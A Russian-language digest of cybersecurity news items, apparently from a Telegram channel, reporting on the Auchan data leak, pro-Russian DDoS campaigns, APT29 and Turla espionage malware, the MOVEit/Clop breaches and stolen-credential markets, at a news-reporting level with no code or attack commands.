Торговая сеть «Ашан» уже подтвердила сведения об утечке данных своих клиентов. В компании проводят внутреннее расследование.


«Служба информационной безопасности "Ашан ритейл Россия" подтвердила утечку данных клиентов торговой сети. В настоящий момент мы проводим внутреннее расследование с целью установления вектора атаки и источника утечки. Мы сожалеем о случившемся и приносим извинения нашим клиентам», — сообщают в пресс-службе ретейлера.


В компании добавили, что предпринимают все необходимые меры для усиления средств защиты информационных систем компании и защиты данных клиентов.

https://i.gyazo.com/fbb1f6009214ec08df8bef9af444f3aa.jpg

Вступить в наш чат


Пророссийские хактивисты атаковали европейские банковские учреждения, назвав Европейский инвестиционный банк (ЕИБ) одной из своих жертв.

Ранее сегодня пророссийская хакерская группа Killnet заявила в своем Telegram, что нацелилась на межсетевую инфраструктуру ЕИБ.

С тех пор ЕИБ подтвердил претензии. В 16:20 банк написал в Твиттере, что в настоящее время он столкнулся с кибератакой, которая повлияла на доступность его веб-сайта.

«Мы реагируем на инцидент», — написал банк в Twitter. На момент написания статьи сайт все еще не работал.

Санкции против Европы

Последняя атака, вероятно, связана с серией крупномасштабных киберугроз против европейских финансовых учреждений со стороны пророссийских хакеров в ответ на европейскую поддержку Украины.

«Здравствуй, Европа! Как обстоят дела с банковской системой IBAN? Я чувствую, что с ней что-то не так. Возможно, на систему трансфера повлияла непогода. А еще синоптики говорят, что умрет не только IBAN, но и SEPA, WISE, SWIFT», — написала банда Killnet в своем Telegram-канале.

Три известные хакерские группировки — Killnet, Anonymous Sudan и REvil — 16 июня провозгласили себя Парламентом Даркнета. Эта фраза почти мгновенно стала популярным ключевым словом в Твиттере среди аналитиков угроз.

https://i.gyazo.com/150684f04515d3120c6b16fe1d75c2ea.png

«72 часа назад три главы хакерских групп из России и Судана провели очередную встречу в парламенте DARKNET и пришли к общему решению: РЕШЕНИЕ №0191. Сегодня мы начинаем вводить санкции в отношении европейских систем банковских переводов SEPA, IBAN, WIRE, SWIFT, WISE», — написал Killnet.

https://i.gyazo.com/a004da3e2497f3b08e56535f79dc42f5.png

10 миллионов долларов за поимку русского хакера

https://i.gyazo.com/b5637da28b1b44cca6ed1707c3084753.jpg

Вступить в наш чатСША предлагают вознаграждение в размере 10 миллионов долларов за поимку печально известного российского оператора программ-вымогателей. Сегодня узнаем, о каком хакере идет речь и чем он известен.

https://i.gyazo.com/fb5a6b74a1cfcb9688b298e8c59389e2.png
Что произошло

Министерство юстиции США предъявило гражданину России обвинение в организации атак программ-вымогателей против «тысяч жертв» в стране и по всему миру.
Михаил Павлович Матвеев (он же Wazawaka, m1x, Boriselcin, and Uhodiransomwar), рассматриваемый 30-летний человек, предположительно является «центральной фигурой» в разработке и развертывании вариантов программ-вымогателей LockBit, Babuk и Hive с июня 2020 г.
Сообщение властей

«Эти жертвы включают в себя правоохранительные органы и другие правительственные учреждения, больницы и школы», — говорится в сообщении Министерства юстиции. «Общие требования о выкупе, предположительно предъявленные участниками этих трех глобальных кампаний по вымогательству к своим жертвам, составляют до 400 миллионов долларов, а общие выплаты выкупа жертвам составляют до 200 миллионов долларов».
Как взламывал хакер

LockBit, Babuk и Hive действуют одинаково, используя незаконно полученный доступ для кражи ценных данных и развертывания программ-вымогателей в скомпрометированных сетях. Злоумышленники также угрожают опубликовать украденную информацию на сайте утечки данных, пытаясь договориться с жертвами о сумме выкупа.
Обвинение

Матвееву были предъявлены обвинения в заговоре с целью передачи требований о выкупе, заговоре с целью повреждения защищенных компьютеров и умышленном повреждении защищенных компьютеров. Если его признают виновным, что маловероятно, ему грозит более 20 лет тюрьмы.
Государственный департамент США также объявил о присуждении до 10 миллионов долларов за информацию, которая приведет к аресту и/или осуждению Матвеева.
По словам журналиста по кибербезопасности Брайана Кребса, одним из псеводнимов Матвеева был Orange, который обвиняемый использовал для создания ныне несуществующего даркнет-форума Russian Anonymous Marketplace (он же RAMP).
Возможны ли новые взломы

Несмотря на шквал действий правоохранительных органов по борьбе с киберпреступной экосистемой в последние годы, модель «программы-вымогатели как услуга» (RaaS) продолжает оставаться прибыльной, предлагая аффилированным лицам высокую прибыль без необходимости разрабатывать и поддерживать сами вредоносные программы.
Финансовая механика, связанная с RaaS, также снизила входной барьер для начинающих киберпреступников, которые могут воспользоваться услугами, предлагаемыми разработчиками программ-вымогателей, для организации атак и присвоения львиной доли доходов, полученных нечестным путем.

Российские хакеры «Tomiris» собирают разведданные с Центральной Азии

https://i.gyazo.com/cd705c4cd2f6b84e450b1d5546ce84c6.jpg

Как показывают свежие данные «Лаборатории Касперского», русскоязычный злоумышленник, скрывающийся за бэкдором, известным как «Tomiris», в первую очередь занимается сбором разведывательных данных в Центральной Азии. В этой статье узнаем больше о взломе и его последствиях.
Ответ специалистов по безопасности

«Целью Томириса постоянно оказывается регулярная кража внутренних документов», — заявили исследователи безопасности Пьер Дельшер и Иван Квятковски в опубликованном сегодня анализе. «Угроза нацелена на правительственные и дипломатические учреждения в СНГ».
Что известно о Tomiris

Впервые Tomiris стала известна в сентябре 2021 года, когда «Лаборатория Касперского» указала на ее потенциальную связь с Nobelium (также известной как APT29, Cozy Bear или Midnight Blizzard), пророссийской хакерской группировкой, стоящей за атакой на цепочку поставок SolarWinds.
Также были обнаружены сходства между бэкдором и другим штаммом вредоносного ПО под названием Kazuar, который приписывается группе Turla (также известной как Krypton, Secret Blizzard, Venomous Bear или Uroburos).

https://i.gyazo.com/1e5d0823b45b092de02f5188858deb01.png

Как происходит атака

В атаках целевого фишинга, организованных группой, использовался «набор инструментов полиглота», состоящий из множества несложных «сжигающих» имплантатов, которые закодированы на разных языках программирования и неоднократно развертывались против одних и тех же целей.

https://i.gyazo.com/0e6bf5d17f2f04488abc9be8ce392df6.png

Помимо использования открытых или коммерчески доступных наступательных инструментов, таких как RATel и Warzone RAT (также известная как Ave Maria), собственный арсенал вредоносных программ, используемый группой: загрузчики, бэкдоры и похитители информации.


Telemiris — бэкдор Python, использующий Telegram в качестве канала управления и контроля (C2).

Roopy — похититель файлов на основе Pascal, предназначенный для поиска интересующих файлов каждые 40–80 минут и их эксфильтрации на удаленный сервер.

JLORAT — похититель файлов, написанный на Rust, который собирает системную информацию, выполняет команды, выдаваемые сервером C2, загружает и скачивает файлы и делает снимки экрана.
Что еще удалось узнать

Расследование атак, проведенное «Лабораторией Касперского», также выявило совпадения с кластером Turla, отслеживаемым компанией Mandiant, принадлежащей Google, под именем UNC4210, и обнаружило, что имплантат QUIETCANARY (также известный как TunnusSched) был развернут против правительственной цели в СНГ с помощью Telemiris.
«Точнее, 13 сентября 2022 года, около 05:40 UTC, оператор попытался развернуть через Telemiris несколько известных имплантов Tomiris: сначала загрузчик Python Meterpreter, затем JLORAT и Roopy», — пояснили исследователи.
«Эти планы были сорваны продуктами безопасности, которые заставили злоумышленника предпринять повторные попытки из разных мест файловой системы. Все эти попытки закончились неудачей. После часовой паузы оператор снова попытался в 07:19 UTC с использованием образца TunnusSched/QUIETCANARY. Образец TunnusSched также был заблокирован».

https://i.gyazo.com/d6ec2c5622e31ff99bbcdddfe2b77399.pngСвязь Tomiris и TurlaТем не менее, несмотря на потенциальные связи между двумя группами, говорят, что Tomiris действуют отдельно от Turla из-за различий в их целях и способах торговли.
С другой стороны, также весьма вероятно, что Turla и Tomiris сотрудничают в отдельных операциях или что обе группировки работают с одним поставщиком программного обеспечения, о чем свидетельствует использование российскими военными разведывательными службами инструментов, предоставленных московским ИТ-подрядчиком NTC. Вулкан.

https://i.gyazo.com/b1bbad2a2559b00f046ebd2bad312420.jpg

Вступить в наш чат


Пророссийская хакерская группа активизировала свои кибератаки на Швейцарию, заявили власти страны. Хакеры отключили несколько крупных веб-сайтов, в том числе сайт аэропорта Женевы. В этой статье подробно разберем новый взлом.

Что произошло

Основные правительственные веб-сайты Швейцарии, включая парламент и федеральную администрацию, в последние дни подверглись атаке распределенного отказа в обслуживании (DDoS). Ответственность за взлом взяла группа NoName.

В заявлении Национальный центр кибербезопасности Швейцарии (NCSC) охарактеризовал интенсивность DDoS-атаки как «исключительно высокую» и предупредил, что некоторые правительственные веб-сайты могут оставаться недоступными.

https://i.gyazo.com/ab32cc24c108df5e8e04460bcf415194.png

Хронология взлома

Группа NoName заявила, что на прошлой неделе она провела атаку на веб-сайт парламента в ответ на принятие Швейцарией еще одного пакета санкций ЕС против России, которая подверглась западным санкциям после начала СВО в Украину в феврале 2022 года.

Группировка атаковала и другие веб-сайты, в том числе веб-сайт аэропорта Женевы, являющегося узловым пунктом для дипломатов и официальных лиц, направляющихся в ООН.

«Веб-сайт международного аэропорта Женевы не устоял перед нашей атакой», — написала группа в мессенджере Telegram, опубликовав изображение медведя с когтями. Аэропорт подтвердил, что его веб-сайт подвергся DDoS-атаке.

https://i.gyazo.com/2aeac99ebc2ca459b011088d2e8049d9.png

Кто стоит за взломом

Ответственность за взлом взяла группа NoName. NoName — пророссийская хакерская группировка, заявившая о себе в марте 2022 года и взявшая на себя ответственность за кибератаки на украинские, американские, европейские сайты госучреждений, СМИ и частных компаний. Оценивается как неорганизованная и свободная пророссийская группа активистов, стремящаяся привлечь внимание в западных странах.

Команда NoName 15 августа 2022 года запустила проект для организации DDos-атак силами добровольцев. Уже в начале сентября того же года хактивисты выплатили первые вознаграждения самым активным участникам краудфандингового проекта. По данным профильных Интернет-ресурсов, на октябрь 2022 года в группе проекта в Telegram насчитывалось около 400 участников.

https://i.gyazo.com/4410f9e154e8ae8cfa228eed51cefa8e.png

https://i.gyazo.com/08dd2af22d49f917bd1a7bfac338b15d.jpg

Вступить в наш чат

Хакеры, подозреваемые в работе на российскую службу внешней разведки, атаковали десятки дипломатов в посольствах в Украине с помощью поддельной рекламы подержанных автомобилей, пытаясь взломать их компьютеры. Широкомасштабная шпионская деятельность была направлена против дипломатов, работающих как минимум в 22 из примерно 80 иностранных представительств в столице Украины Киеве, говорится в отчете аналитиков исследовательского подразделения Palo Alto Networks Unit 42. В этой статье узнаем подробности взлома.

Что произошло

Польский дипломат, который отказался назвать свое имя, сославшись на соображения безопасности, подтвердил роль рекламы в цифровом вторжении. Хакеры, известные как APT29 или «Cozy Bear», перехватили и скопировали эту рекламу (BMW), внедрили в нее вредоносное ПО, а затем отправили ее десяткам других иностранных дипломатов, работающих в Киеве.«Это ошеломляет по своим масштабам, ведь обычно такие взломы представляют собой узкомасштабные и тайные операции», — говорится в отчете.

https://i.gyazo.com/4572263a2778beaa2fe93c46e7b7a76f.png

Как произошел взлом


«Взлом начался с безобидного и законного события», — говорится в отчете, о котором впервые сообщило агентство Reuters.




«В середине апреля 2023 года дипломат Министерства иностранных дел Польши отправил по электронной почте в различные посольства настоящие листовки, рекламирующие продажу подержанного седана BMW 5-й серии, находящегося в Киеве».

Хакеры, известные как APT29 или «Cozy Bear», перехватили и скопировали эту рекламу (BMW), внедрили в нее вредоносное ПО, а затем отправили ее десяткам других иностранных дипломатов, работающих в Киеве.

Кто стоит за взломом

В 2021 году спецслужбы США и Великобритании идентифицировали APT29 как подразделение Службы внешней разведки России, СВР. СВР не ответила на запрос Reuters о комментариях по поводу хакерской кампании.

В апреле польские органы контрразведки и кибербезопасности предупредили, что эта же группа провела «широкомасштабную разведывательную кампанию» против стран-членов НАТО, Европейского Союза и Африки.

Исследователи из Unit 42 смогли связать фальшивую рекламу автомобиля с СВР, потому что хакеры повторно использовали определенные инструменты и методы, которые ранее были связаны с этой хакерской группировкой.

https://i.gyazo.com/d89905796b29ffece126cdfbb6962a6c.png

Б/У BMW стал инструментом взлома

Польский дипломат сказал, что отправил объявление в различные посольства в Киеве, и что кто-то перезвонил ему, потому что цена выглядела «привлекательной».


«Когда я с ними связался, я понял, что они говорили о более низкой цене, чем я указал в объявлении, и это меня насторожило», — сказал дипломат.

Как выяснилось, хакеры указали на BMW дипломата более низкую цену — 7500 евро — в своей поддельной версии рекламы, пытаясь побудить больше людей загружать вредоносное программное обеспечение, которое дало бы им удаленный доступ к их устройствам.

Это программное обеспечение, по словам Unit 42, было замаскировано под альбом фотографий подержанного BMW. В отчете говорится, что попытки открыть эти фотографии заразили бы машину жертвы.

https://i.gyazo.com/406de924b847c7df52ecf966b7a790a7.png

Масштаб утечки

21 из 22 посольств, подвергшихся нападению хакеров, не предоставили комментариев. Неясно, какие посольства, если таковые имеются, были скомпрометированы.

Представитель Госдепартамента США заявил, что они «знали об этой деятельности и на основании анализа Управления кибербезопасности и технологической безопасности пришли к выводу, что она не затронула системы или учетные записи департамента».

Что касается автомобиля, то он по-прежнему доступен, сообщил польский дипломат:«Возможно, я попытаюсь продать его в Польше», — сказал он. «После этой ситуации я больше не хочу иметь проблем».

https://i.gyazo.com/6dde5b922ee3821c152f48388efb89be.png

Самый незаметный бэкдор от русских хакеров

https://i.gyazo.com/e9b81697acd378bcd533c7f8fe3ec4b7.jpg

Вступить в наш чатОборонный сектор в Украине и Восточной Европе стал мишенью нового бэкдора на основе .NET под названием DeliveryCheck (он же CAPIBAR или GAMEDAY). В этой статье узнаем, кто стоит за взломом, и какой ущерб он нанёс.

Что произошло
Группа разведки угроз Microsoft в сотрудничестве с Украинской группой реагирования на компьютерные чрезвычайные ситуации (CERT-UA) обвинила в атаках российскую хакерскую группировку, известную как Turla, которая также отслеживается под именами Iron Hunter, Secret Blizzard (ранее Krypton), Uroburos, Venomous Bear и Waterbug. Специалисты считают, что группировка связана с Федеральной службой безопасности России (ФСБ).

https://i.gyazo.com/a6836d5a490995d6eedf36f2e7f38bc9.png

https://telegra.ph/file/a2599e4b1e5052fce4c28.png
Механизм взлома
«DeliveryCheck распространяется по электронной почте в виде документов с вредоносными вирусами», — говорится в серии твитов компании. «Он сохраняется через запланированную задачу, которая загружает и запускает его в памяти компьютера. Он также связывается с сервером C2 для получения задач, которые могут включать запуск произвольных загрузок, встроенных в таблицы стилей XSLT».

https://i.gyazo.com/2ca50a5de4d4cb602ca62add9ff3b3ce.png

https://telegra.ph/file/ad450da6830f3a469e5c9.png

Успешный доступ также сопровождается в некоторых случаях распространением известной малвари Turla, получившей название Kazuar. Она оборудована для кражи файлов конфигурации приложений, журналов событий и широкого спектра данных из веб-браузеров.
Конечной целью атак является эксфильтрация (метод взлома, который заключается в извлечении информации из системы или сети, не используя открытый доступ или пароль) сообщений из приложения обмена сообщениями Signal для Windows, что позволяет злоумышленнику получить доступ к конфиденциальным разговорам, документам и изображениям в целевых системах.

https://telegra.ph/file/940e68ddd9d3f1e15817b.png

https://i.gyazo.com/1387109903752af4e4c1202c86013c8d.png

В чем особенность DeliveryCheck
Примечательным аспектом DeliveryCheck является его способность взламывать серверы Microsoft Exchange для установки компонента на стороне сервера с помощью PowerShell Desired State Configuration (DSC) — платформы управления PowerShell, которая помогает администраторам автоматизировать настройку систем Windows.
«DSC создает файл Managed Object Format (MOF), содержащий сценарий PowerShell, который загружает встроенную загрузку .NET в память, фактически превращая сервер жертвы в центр управления вредоносными программами», — пояснили в Microsoft.

https://i.gyazo.com/24f95e97245f84c67051fcc2e7d7b3aa.png

https://telegra.ph/file/d7783903030b7c20890ac.png

Как обнаружился бэкдор
Раскрытие информации произошло после того, как Киберполиция Украины ликвидировала огромную ферму ботов, на которой более 100 человек якобы распространяли враждебную пропаганду, оправдывающую российскую сво, сливали личную информацию, принадлежащую гражданам Украины, и участвовали в различных мошеннических схемах.
В рамках операции были проведены обыски в 21 офисе, в результате которых изъято компьютерное оборудование, мобильные телефоны, более 250 GSM-шлюзов и около 150 000 SIM-карт, принадлежащих различным операторам мобильной связи.

Вывод
Иными словами, взлом не был замечен напрямую. О бэкдоре стало известно случайно, неполадок в сети до обыска фермы оборонный сектор Украины не обнаружил. Официальная информация о масштабах бэкдора не разглашается.

Русские хакеры вымогают деньги у правительства США

https://i.gyazo.com/9d15555a4884c09dbf7bf6755c445ba6.jpg

Вступить в наш чатПо данным одного из ведущих агентств США по кибербезопасности, несколько федеральных правительственных учреждений США пострадали в результате глобальной кибератаки со стороны российских хакеров, использующих уязвимость в широко используемом программном обеспечении.
Сегодня подробно разберем, как произошла кибератака, и кто за ней стоит.
Что произошло

Агентство США по кибербезопасности и безопасности инфраструктуры «оказывает поддержку нескольким федеральным агентствам, которые столкнулись со вторжениями, затрагивающими их приложения MOVEit», — заявил Эрик Гольдштейн, исполнительный помощник директора агентства по кибербезопасности, в заявлении для CNN, имея в виду ПО, через которое произошел взлом. «Мы работаем в срочном порядке, чтобы понять последствия и обеспечить своевременное устранение».
Clop, банда вымогателей, предположительно ответственная за это, как известно, обычно требует многомиллионных выкупов. Но никаких требований о выкупе от федеральных агентств не поступало, сообщил высокопоставленный чиновник журналистам на брифинге.
Ответ CISA пришел после того, как Progress Software, американская фирма, производящая программное обеспечение, используемое хакерами, заявила, что обнаружила вторую уязвимость в коде, над исправлением которой компания работала. Министерство энергетики входит в число нескольких федеральных агентств, взломанных в ходе продолжающейся глобальной хакерской кампании, подтвердил CNN представитель министерства.

https://i.gyazo.com/5db9540e5ab507ad1676636deeb2c937.png
Последствия взлома

Взломы не оказали «значительного воздействия» на федеральные гражданские агентства, заявила журналистам директор CISA Джен Истерли, добавив, что хакеры «в значительной степени просто авантюристы» в использовании уязвимости в программном обеспечении для взлома сетей.
Эта новость дополняет растущее число жертв широкомасштабной хакерской кампании, которая началась два месяца назад и затронула крупные университеты США и правительства штатов. Хакерское веселье усиливает давление на федеральных чиновников, которые пообещали положить конец угрозе атак программ-вымогателей, которые нанесли ущерб школам, больницам и местным органам власти по всей территории США.
Университет Джона Хопкинса в Балтиморе и известная система здравоохранения университета заявили, что в результате взлома могла быть украдена «конфиденциальная личная и финансовая информация», включая записи о медицинских счетах.
Подробности кибератаки

Хакеры использовали брешь в широко используемом программном обеспечении, известном как MOVEit, которое компании и агентства используют для передачи данных. Progress Software, американская фирма, производящая программное обеспечение, сообщила CNN, что в программном обеспечении была обнаружена новая уязвимость, «которая может быть использована злоумышленником».


«Мы связались с клиентами и сообщили о шагах, которые им необходимо предпринять для дальнейшей защиты своих сред, и мы также отключили MOVEit Cloud, поскольку мы срочно работаем над устранением проблемы», — говорится в заявлении компании.

https://i.gyazo.com/b0299d2c79a24c002288631d317655b0.png

Особенность взлома

Российские хакеры первыми воспользовались уязвимостью MOVEit, но эксперты говорят, что другие группировки теперь тоже могут иметь доступ к программному коду, необходимому для проведения атак.
Группа вымогателей дала жертвам время, чтобы связаться с ними по поводу выплаты выкупа. Хакеры также уточнили: «Если вы представитель государственной, городской или полицейской службы, не волнуйтесь, мы стерли все ваши данные. Вам не нужно связываться с нами. Мы не заинтересованы в раскрытии такой информации».
Кто взял на себя ответственность

Группа вымогателей CLOP — одна из многочисленных банд в Восточной Европе и России, которые почти исключительно сосредоточены на том, чтобы выманить у своих жертв как можно больше денег.
«Активность, которую мы наблюдаем в настоящее время, — добавление названий компаний на их сайт утечки — это тактика, чтобы напугать жертв, как зарегистрированных, так и не внесенных в список, чтобы они заплатили», — сказал CNN Рэйф Пиллинг, директор по исследованию угроз в Secureworks, принадлежащей Dell.

https://i.gyazo.com/69a635c6bba5dc513e9cbd257e435678.png

https://i.gyazo.com/455f951f1c5349826e95b43f488f1b14.jpg

Вступить в наш чат

Украинская служба контрразведки заявила, что российские хакеры изо всех сил пытаются придумать способ вывести из строя спутники Илона Маска.

Что произошло

Украинские военные используют технологию Starlink для связи на поле боя, и она стала целью российской разведывательной службы, которая пытается загрузить на спутники вредоносное ПО.

Над Украиной пролетают несколько тысяч спутников, и член высшего отдела безопасности, занимающийся этим вопросом, сказал, что их не слишком беспокоят попытки России отключить некоторые из них.

https://i.gyazo.com/87488f6065b0585e61a5641b72a9b149.png

Ответ властей

Илья Витюк, начальник управления кибербезопасности СБУ, ответил: «Мы видели, что были попытки проникновения в эти системы. Наш враг чрезвычайно сосредоточен на получении информации о Starlink. Они планировали эти операции давно, и некоторые хакерские группы переместились ближе к линии фронта. Это было очень интересное вредоносное ПО... оно дало им возможность получить конфигурации Starlink, так что, в конце концов, они смогли понять местоположение».

Маск не прокомментировал новости о том, что Россия пытается взломать ее технологии.

https://i.gyazo.com/997617a2afcb7fd9f90b6ea120e713f0.png

Последствия атаки

Пока нет достоверной информации о масштабах взлома, и добились ли хакеры своей цели. На сегодняшний день ни одна из российских группировок не взяла на себя ответственность за взломы. Сообщается, что несмотря на то, что хакерам удалось вычислить местоположение нескольких спутник, это всё равно не нанесло серьезного ущерба.

https://i.gyazo.com/97f591b764476747937a1331291ae971.png

Российские хакеры используют приложение Zulip Chat в дипломатических фишинговых атаках

https://i.gyazo.com/40607406b4ea7c07227b2f558a94e152.jpg

Вступить в наш чат
Продолжающаяся кампания, нацеленная на министерства иностранных дел стран, входящих в НАТО, указывает на причастность к этому российских хакеров.
Особенности атаки

В фишинговых атаках используются PDF-документы с дипломатическими приманками, некоторые из которых замаскированы под сообщения из Германии, для доставки варианта вредоносного ПО под названием Duke, которое было приписано APT29 (он же BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard и The Dukes).

https://i.gyazo.com/4f4a618c0a165d6f35675ba5c78f5406.png

«Злоумышленник использовал Zulip — чат-приложение с открытым исходным кодом — для управления и контроля, чтобы уклоняться от своих действий и скрывать их за законным веб-трафиком», — заявила голландская компания по кибербезопасности EclecticIQ в анализе, проведенном на прошлой неделе.
Последовательность заражения следующая: вложение в формате PDF под названием «Прощание с послом Германии» содержит код JavaScript, который инициирует многоэтапный процесс, чтобы оставить постоянный бэкдор в скомпрометированных сетях.
Были ли подобные атаки ранее

Об использовании APT29 тем приглашений ранее сообщал Lab52, который задокументировал атаку, которая выдавала себя за норвежское посольство для доставки полезной нагрузки DLL, способной связаться с удаленным сервером для получения дополнительных полезных данных.
Использование домена «bahamas.gov[.]bs» в обоих наборах вторжений еще больше укрепляет эту связь. Выводы также подтверждают предыдущее исследование Anheng Threat Intelligence Center, опубликованное в прошлом месяце.
Если потенциальная цель поддается фишинговой ловушке, открыв файл PDF, запускается вредоносная дроппер HTML под названием Invitation_Farewell_DE_EMB для выполнения JavaScript, который сбрасывает файл ZIP-архива, который, в свою очередь, упаковывается в файл HTML-приложения (HTA), предназначенный для развертывания. вредоносное ПО Duke.
Командование и управление (C2) облегчается за счет использования Zulip API для отправки сведений о жертве в чат-комнату, контролируемую действующим лицом (toyy.zulipchat[.]com), а также для удаленного захвата скомпрометированных хостов.

https://i.gyazo.com/f8121aa31e449f38c5e01e13ffe1302b.png
Масштаб атаки

EclecticIQ заявила, что обнаружила второй PDF-файл, который, вероятно, использовался APT29 для разведки или тестирования.

«Он не содержал полезной нагрузки, но уведомлял хакера, если жертва открывала вложение электронной почты, получая уведомление через скомпрометированный домен edenparkweddings[.]com», — заявили исследователи.

Стоит отметить, что злоупотребление Zulip является нормой для спонсируемой государством группы, которая имеет опыт использования широкого спектра законных интернет-сервисов, таких как Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase и Trello. для С2.

Основными целями APT29 являются правительства и государственные деятели, политические организации, исследовательские фирмы и критически важные отрасли в США и Европе. Но, что интересно, неизвестный противник использует свою тактику для взлома китайскоязычных пользователей с помощью Cobalt Strike.

Это произошло после того, как Группа реагирования на компьютерные чрезвычайные ситуации Украины (CERT-UA) предупредила о новой серии фишинговых атак против государственных организаций Украины с использованием набора инструментов постэксплуатации с открытым исходным кодом на основе Go под названием Merlin. Активность отслеживается под псевдонимом UAC-0154.

https://i.gyazo.com/847a97c0274eb1e6cd05e06d6c8d357f.png

Трояны в рекламе: новый ход российских хакеров
https://i.gyazo.com/fee494a47ec13f3a17b95d2305ac49ed.jpg

Вступить в наш чатМайкл Сикорски, технический директор и вице-президент по разработке Unit 42 компании Palo Alto Networks, рассказал об изобретательности русских хакеров. В этой статье подробнее узнаем о необычном способе взлома. Кстати, эту кибератаку мы уже освещали в этой статье.

https://i.gyazo.com/80006248cbb1c14f3e1b46b19f497a00.png

В чем суть атаки
По словам Сикорского, этот метод предполагает использование, казалось бы, безобидной рекламы в качестве средства распространения вредоносного ПО. Российские хакеры перехватили рекламу польского дипломата, который пытался продать свой автомобиль BMW на фоне конфликта с Украиной. Хакеры перепрофилировали рекламу, встроив в нее вредоносное ПО. Эта тактика, по словам Сикорского, подчеркивает российскую стратегию по созданию тайных крючков в иностранных системах.

https://i.gyazo.com/14032e1c3a8f0967db4e29a563615c0e.png

Компрометируя посольства и дипломатические миссии, злоумышленники могут заложить основу для более изощренных атак, потенциально влияющих на политические решения. Что отличает этот инцидент, так это новаторское использование подлинного документа в качестве носителя вредоносного ПО.

Насколько опасна новая тактика
«Те же хакеры, которые отвечали за SolarWinds — мы отслеживали их как Cloaked Ursa — получила этот документ и разослала его по посольствам по всей Украине», — сказал он. «А когда Россия заполучила его (объявление о продаже BMW), они даже снизили цену, внедрили в него вредоносное ПО и начали его отправлять снова и снова. Это показывает, что у русских хакеров есть доступ к украинским сетям».

https://i.gyazo.com/97bb4a04ae651eac106cd7f9004fbbf2.png
Специалист отметил, что кибератаки русских хакеров становятся все более изощренные и неочевидные. Это первый зафиксированный случай, когда исходный документ был использован как носитель вредоносного ПО. Сикорски добавил, что такой способ взлома может стать реальной проблемой, ведь от него невозможно защититься.

Хакеры NoName наносят удар

https://i.gyazo.com/a87d8b96ff384d9a66731806a27e22d5.jpg

Вступить в наш чатНеделю назад мы уже обсуждали хакерскую группировку NoName, прочитать можно тут. В этом подкасте узнаем подробнее о NoName.
С чего всё началось

Было отмечено, что в первой половине 2023 года группировка NoName057(16) была одной из самых активных на политической арене.
В последние месяцы методы группы усовершенствовались, согласно эксклюзивному интервью Cybernews о NoName, в котором в этом месяце участвовали два исследователя угроз Radware в Black Hat.
Чем сейчас занимаются хакеры

Согласно последнему сообщению Radware, группа вербует сторонников своего бот-проекта DDoSia из даркнета. Затем новобранцы получают выплаты в криптовалюте в зависимости от того, в скольких целевых кампаниях они участвуют и насколько успешными являются атаки.
Исследователи также обнаружили, что NoName изменила тактику и начала целенаправленно атаковать критически важную инфраструктуру, такую как финансовый, государственный и авиационный секторы, чтобы оптимизировать воздействие своих DDoS-атак.

https://i.gyazo.com/718a3c32ddff03608255ed125449ef39.pngНедавня я кибератака

В июле NoName057(16) взяли на себя ответственность за атаки на банковские системы Украины и Италии, французский парламент и почти дюжину атак на финансовый и авиационный сектор Швейцарии.

https://i.gyazo.com/6a3f33b45a4ce6ca5c042b1dafce0640.pngИх DDoS-атака переполнила сервера тысячами запросов трафика от случайных компьютеров-ботов, что привело к повсеместному сбою веб-сайтов.

https://i.gyazo.com/0bb7d133fb366f1ac022aa6adf97c160.pngМежду тем, атака на польские железные дороги привела к аварийной остановке около двадцати поездов после того, как двое польских граждан подделали сигнальную систему поездов, используя радиочастоту. СМИ связывают эту атаку с пророссийскими хакерскими группировками.

https://i.gyazo.com/0fbc3408273a117f98cdcd3e6f37aa17.png

Русские и турецкие кибермошенники объединились

https://i.gyazo.com/dd9257bd6841509dd5949d18f376a0df.jpg

Вступить в наш чатКиберпреступники в Турции объединились с недавно прибывшими российскими хакерами-эмигрантами, чтобы наводнить некогда умирающий онлайн-рынок десятками миллионов недавно украденных личных учетных данных. Специалисты уже назвали это развитием транснационального характера мошенничества. В этой статье узнаем об этом подробнее.
Что произошло

Тысячи мужчин, многие из которых получили образование инженеров-программистов, бежали из России в Турцию в сентябре прошлого года.
Некоторые из них, по словам турецкой полиции и исследователей безопасности, обратились к относительно низкоуровневому онлайн-мошенничеству, объединяясь с авторитетными турецкими коллегами, чтобы избежать обнаружения, отмывать свои доходы и продавать учетные данные, полученные с компьютеров по всему миру.

https://i.gyazo.com/de7815638a81e245b7903c7ba9afcf0b.png
Расследование мошенничества

Недавний всплеск активности побудил турецкую полицию провести расследование.
Специалисты заявили, что преступники, базирующиеся в русскоязычных странах, как правило, действуют относительно открыто, поскольку меры со стороны их правительств были слабыми.
Полицейские сообщили, что хакеры в основном создают фишинговые ссылки и воруют личную информацию жертв, объединяясь вместе с турецкими онлайн-преступниками.
Куда утекает информация

Излюбленная торговая площадка киберпреступников в последние месяцы была наводнена десятками миллионов украденных кредитных карт, паролей и учетных данных.
Эта находка, обнаруженная специалистом по информационной безопасности Ошером Ассором из Auren Cyber Israel, использует сложный код, который отправляет только что украденные учетные данные большому количеству клиентов, которые подписываются на потоки данных в группах Telegram.
Данные собираются с помощью обычного вредоносного ПО, которое, похоже, обходит большинство известных антивирусных программ. Ассор считает, что вредоносное ПО под названием Redline случайно загружается людьми, использующими нелегальные веб-сайты для игры в видеоигры или пиратские версии популярного программного обеспечения.

https://i.gyazo.com/bb8f1962fb667675654eeb70400bf598.png
Что именно крадут мошенники

Но особую ценность данных, собираемых Redline, делает тот факт, что они также крадут файлы cookie или небольшие фрагменты личного кода, которые находятся в браузерах людей, позволяя хакерам выдавать себя за жертву в Интернете и даже копировать кредитные карты, которые люди сохраняют в своих аккаунтах.
«Такие данные более ценны, потому что они свежие», — сказал Ассор. «Кража паролей не является чем-то новым, но уникальным здесь является то, что информация поступает «свежей» — каждое обновление содержит пакет с сотнями и тысячами журналов, украденных за последние несколько часов, что сохраняет файлы cookie «горячими».
На скриншотах разговоров с турецким хакером, которыми Ассор поделился с Financial Times, видно, что сотни групп Telegram предлагают доступ к свежесобранным данным, часто всего за 50 долларов. Каждый пакет содержит тысячи записей — на одном снимке экрана показано 76 миллионов различных точек данных, сопоставленных для удобства использования.
Мнение специалистов

Турецкий специалист по информационной безопасности, попросивший не называть его имени, поскольку контакты с хакерами в Турции подпадают под серую зону закона, заявил, что он проник в одну из этих групп Telegram, маскируясь под покупателя.
В течение нескольких месяцев он наблюдал, как вновь прибывшие российские хакеры обучали своих турецких коллег сложному коду для сопоставления огромных объемов собираемых данных, в то время как турецкие преступники использовали свои контакты в Западной Европе, особенно в Германии, для обеспечения более выгодных цен и более эффективной работы.
